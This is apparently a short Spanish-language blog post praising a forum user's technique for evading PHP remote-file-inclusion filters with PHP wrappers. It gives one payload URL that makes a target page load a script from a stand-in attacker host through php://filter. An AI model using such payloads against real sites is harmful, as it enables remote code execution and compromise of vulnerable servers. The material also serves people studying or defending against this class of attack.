Hace nada he leído en undersecurity.net (http://foro.undersecurity.net/read.php?15,7047,7047#msg-7047) una entrada escrita por Seth, en la que nos explica una manera novedosa de evitar los filtros programados en las web PHP (>=5.0.0) para contrarrestar la inclusión remota de archivos.
La técnica consiste en las envolturas PHP, o PHP Wrappers (http://us2.php.net/manual/en/wrappers.php.php), dandoles el uso visto en el post de Seth, tal que:
http://victima.com/inc.php?page=php://filter/resource=http://atacante.com/rfi.php?
Un aplauso para Seth ;).
-H4ppyH4ck1n9-
No hay comentarios:
Publicar un comentario